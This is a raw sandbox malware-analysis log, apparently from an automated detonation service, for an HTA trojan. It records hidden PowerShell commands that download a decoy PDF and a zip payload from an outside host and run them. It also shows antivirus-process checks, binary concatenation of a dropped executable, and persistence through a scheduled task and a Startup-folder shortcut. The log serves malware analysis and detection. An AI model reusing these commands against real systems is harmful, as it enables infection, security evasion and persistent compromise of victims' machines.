              Source: 29.2.Carter.pif.38bceb0.1.raw.unpack, qP0JoydMkk5flJ2CzcAH0gMxtb0EV.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: classification engineClassification label: mal100.troj.expl.evad.winHTA@69/80@4/1
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002DA6AD GetLastError,FormatMessageW,29_2_002DA6AD
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002C8DE9 AdjustTokenPrivileges,CloseHandle,29_2_002C8DE9
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002C9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,29_2_002C9399
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_00938DE9 AdjustTokenPrivileges,CloseHandle,37_2_00938DE9
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_00939399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,37_2_00939399
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 14_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,14_2_004044A5
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002D4148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,29_2_002D4148
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 14_2_004024FB CoCreateInstance,14_2_004024FB
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002D443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,29_2_002D443D
              Source: C:\Windows\SysWOW64\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\c[1].batJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9168:120:WilError_03
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8140:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8828:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7156:120:WilError_03
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\R2fsONidW19SbcLy
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8940:120:WilError_03
              Source: C:\Windows\SysWOW64\mshta.exeFile created: C:\Users\user\AppData\Local\Temp\temp.batJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat"
              Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\c2.hta"
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\f.pdf"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2052 --field-trial-handle=1648,i,6467156151985402777,10202988688681388531,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\msword\msword.exe msword.exe
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\cleanup.bat"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 90
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 220239
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "DimPieLilHot" Statistical
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Response + ..\Fires + ..\Automatic F
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Carter.pif F
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url" & echo URL="C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url" & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R"
              Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js"
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifProcess created: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat"Jump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\cleanup.bat"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\f.pdf"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\msword\msword.exe msword.exeJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2052 --field-trial-handle=1648,i,6467156151985402777,10202988688681388531,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 90
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 220239
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "DimPieLilHot" Statistical
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Response + ..\Fires + ..\Automatic F
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Carter.pif F
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url" & echo URL="C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url" & exit
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifProcess created: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R"
              Source: C:\Windows\System32\wscript.exeProcess created: unknown unknown
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msxml6.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msdart.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
